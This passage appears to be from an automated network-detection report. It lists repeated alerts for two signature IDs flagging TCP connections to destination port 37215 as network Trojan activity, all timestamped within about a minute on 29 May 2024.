                SID:2835222
                Source Port:33850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265565
                SID:2829579
                Source Port:48366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.925870
                SID:2835222
                Source Port:59610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782843
                SID:2829579
                Source Port:40826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023330
                SID:2829579
                Source Port:32820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783495
                SID:2829579
                Source Port:51148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001097
                SID:2829579
                Source Port:50212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.375213
                SID:2829579
                Source Port:35228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659542
                SID:2829579
                Source Port:42708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.421411
                SID:2835222
                Source Port:48174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.280595
                SID:2829579
                Source Port:53540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.270376
                SID:2835222
                Source Port:51462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076252
                SID:2835222
                Source Port:49144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873034
                SID:2835222
                Source Port:37648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.804783
                SID:2835222
                Source Port:59706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.966703
                SID:2829579
                Source Port:58326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321717
                SID:2835222
                Source Port:51286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948054
                SID:2829579
                Source Port:37558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655068
                SID:2829579
                Source Port:38776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.653895
                SID:2829579
                Source Port:48772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437325
                SID:2835222
                Source Port:35994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209734
                SID:2829579
                Source Port:39872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567672
                SID:2829579
                Source Port:49524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502619
                SID:2829579
                Source Port:47332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.228996
                SID:2835222
                Source Port:57318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555368
                SID:2829579
                Source Port:44284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.322888
                SID:2835222
                Source Port:37110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686248
                SID:2835222
                Source Port:38492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209859
                SID:2835222
                Source Port:36668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614152
                SID:2829579
                Source Port:36056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663242
                SID:2829579
                Source Port:40838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896023
                SID:2829579
                Source Port:52778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900409
                SID:2835222
                Source Port:55848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583790
                SID:2829579
                Source Port:44050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.515343
                SID:2829579
                Source Port:52698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385327
                SID:2835222
                Source Port:55382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.552134
                SID:2835222
                Source Port:39990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.823985
                SID:2835222
                Source Port:50468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.984743
                SID:2829579
                Source Port:59626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461897
                SID:2835222
                Source Port:50298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.979593
                SID:2829579
                Source Port:42742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166394
                SID:2835222
                Source Port:45490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782227
                SID:2835222
                Source Port:55814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946800
                SID:2829579
                Source Port:43568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789338
                SID:2835222
                Source Port:46852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.771206
                SID:2835222
                Source Port:40946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.882766
                SID:2829579
                Source Port:33614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688876
                SID:2835222
                Source Port:45592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785906
                SID:2829579
                Source Port:38970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.966798
                SID:2835222
                Source Port:33586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.062676
                SID:2835222
                Source Port:53350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785706
                SID:2829579
                Source Port:55670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983149
                SID:2835222
                Source Port:44788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910394
                SID:2829579
                Source Port:44040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.022172
                SID:2835222
                Source Port:46412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901944
                SID:2829579
                Source Port:39790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.926816
                SID:2829579
                Source Port:44474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.563368
                SID:2835222
                Source Port:36564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223922
                SID:2829579
                Source Port:57960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163408
                SID:2835222
                Source Port:44692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222716
                SID:2835222
                Source Port:43200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652861
                SID:2829579
                Source Port:44238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.433017
                SID:2829579
                Source Port:35814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651649
                SID:2835222
                Source Port:34162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567118
                SID:2829579
                Source Port:40636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.587014
                SID:2829579
                Source Port:53150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666410
                SID:2829579
                Source Port:47720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.722129
                SID:2835222
                Source Port:47454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840058
                SID:2835222
                Source Port:48552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263886
                SID:2835222
                Source Port:47874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.517832
                SID:2829579
                Source Port:59414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.852127
                SID:2829579
                Source Port:33922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.467050
                SID:2829579
                Source Port:36588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915768
                SID:2835222
                Source Port:33702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.268519
                SID:2829579
                Source Port:52100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928461
                SID:2835222
                Source Port:60306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.715591
                SID:2829579
                Source Port:48520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.831292
                SID:2829579
                Source Port:43130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.468774
                SID:2829579
                Source Port:50878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419326
                SID:2829579
                Source Port:45186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.740251
                SID:2829579
                Source Port:41968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.726209
                SID:2835222
                Source Port:45890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962182
                SID:2835222
                Source Port:41838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.867821
                SID:2829579
                Source Port:52328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179017
                SID:2829579
                Source Port:52580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.821378
                SID:2835222
                Source Port:39086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815105
                SID:2829579
                Source Port:32788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898755
                SID:2835222
                Source Port:36994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162223
                SID:2829579
                Source Port:38834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.286076
                SID:2829579
                Source Port:33178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.834746
                SID:2835222
                Source Port:48536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652074
                SID:2829579
                Source Port:47348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.722273
                SID:2835222
                Source Port:51780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281550
                SID:2829579
                Source Port:41050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655202
                SID:2835222
                Source Port:50208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076517
                SID:2835222
                Source Port:44958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.817960
                SID:2829579
                Source Port:52364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.447121
                SID:2829579
                Source Port:60278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610031
                SID:2829579
                Source Port:54130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.278640
                SID:2835222
                Source Port:56326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.584035
                SID:2835222
                Source Port:55776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.427524
                SID:2829579
                Source Port:41058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778585
                SID:2835222
                Source Port:38962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969974
                SID:2829579
                Source Port:59512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418127
                SID:2829579
                Source Port:34512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499884
                SID:2829579
                Source Port:41752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432999
                SID:2835222
                Source Port:52360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.817199
                SID:2835222
                Source Port:57664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559747
                SID:2835222
                Source Port:32908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.967520
                SID:2835222
                Source Port:33058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419371
                SID:2829579
                Source Port:38866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287716
                SID:2835222
                Source Port:59770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.813084
                SID:2835222
                Source Port:52084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967272
                SID:2829579
                Source Port:48532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586017
                SID:2829579
                Source Port:53366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.244063
                SID:2829579
                Source Port:48198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166853
                SID:2829579
                Source Port:41018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.287385
                SID:2829579
                Source Port:34564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.224440
                SID:2829579
                Source Port:53648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.241678
                SID:2835222
                Source Port:37512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586120
                SID:2835222
                Source Port:38720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.788385
                SID:2829579
                Source Port:42098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163666
                SID:2829579
                Source Port:53290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265618
                SID:2835222
                Source Port:43742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.960461
                SID:2829579
                Source Port:41258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.894770
                SID:2835222
                Source Port:35858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462451
                SID:2835222
                Source Port:52180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.928152
                SID:2835222
                Source Port:32922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.982900
                SID:2829579
                Source Port:59102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583376
                SID:2829579
                Source Port:57192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.020599
                SID:2829579
                Source Port:57444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779360
                SID:2835222
                Source Port:45900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.149244
                SID:2829579
                Source Port:60572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.740426
                SID:2829579
                Source Port:56730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.770321
                SID:2835222
                Source Port:52184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651815
                SID:2829579
                Source Port:33256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.044962
                SID:2835222
                Source Port:53660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916101
                SID:2835222
                Source Port:57622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.721881
                SID:2829579
                Source Port:44634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.371387
                SID:2829579
                Source Port:48718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557015
                SID:2829579
                Source Port:49776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266948
                SID:2835222
                Source Port:43386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688965
                SID:2835222
                Source Port:39516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464181
                SID:2835222
                Source Port:48412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.656655
                SID:2835222
                Source Port:47122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.114258
                SID:2835222
                Source Port:57680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869411
                SID:2835222
                Source Port:51296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.897998
                SID:2829579
                Source Port:35566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.670616
                SID:2829579
                Source Port:36274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.268384
                SID:2829579
                Source Port:38966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655725
                SID:2829579
                Source Port:43928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.980766
                SID:2829579
                Source Port:33814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.528539
                SID:2829579
                Source Port:34930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.960396
                SID:2829579
                Source Port:50178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767551
                SID:2835222
                Source Port:49710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989982
                SID:2835222
                Source Port:49950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417135
                SID:2829579
                Source Port:57942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.428361
                SID:2829579
                Source Port:33054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586739
                SID:2829579
                Source Port:54540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559950
                SID:2835222
                Source Port:42586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.872940
                SID:2835222
                Source Port:51450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113285
                SID:2835222
                Source Port:55510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.726253
                SID:2829579
                Source Port:34022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.809225
                SID:2835222
                Source Port:53690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.278098
                SID:2829579
                Source Port:45118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180125
                SID:2829579
                Source Port:56650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385396
                SID:2835222
                Source Port:36704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.882323
                SID:2835222
                Source Port:32898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.504188
                SID:2835222
                Source Port:49548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763611
                SID:2835222
                Source Port:56344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001247
                SID:2835222
                Source Port:41342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893770
                SID:2829579
                Source Port:54888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653970
                SID:2829579
                Source Port:50424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.235434
                SID:2835222
                Source Port:46004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.949698
                SID:2829579
                Source Port:51470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.261771
                SID:2829579
                Source Port:48410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.415712
                SID:2835222
                Source Port:40036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.268628
                SID:2829579
                Source Port:43122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072320
                SID:2835222
                Source Port:41588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072802
                SID:2835222
                Source Port:53192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628157
                SID:2829579
                Source Port:48714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660111
                SID:2835222
                Source Port:55062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.318387
                SID:2829579
                Source Port:46560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.563552
                SID:2835222
                Source Port:53428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.739154
                SID:2835222
                Source Port:59770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675195
                SID:2829579
                Source Port:41548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074484
                SID:2835222
                Source Port:46664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.706343
                SID:2829579
                Source Port:51194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902940
                SID:2835222
                Source Port:60254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931809
                SID:2835222
                Source Port:49818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466589
                SID:2835222
                Source Port:38180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965765
                SID:2835222
                Source Port:45288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.817041
                SID:2829579
                Source Port:44578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.718024
                SID:2829579
                Source Port:58666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.084815
                SID:2835222
                Source Port:40882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336399
                SID:2829579
                Source Port:57886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714282
                SID:2835222
                Source Port:57424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171450
                SID:2829579
                Source Port:34814
                Destination Port:37215
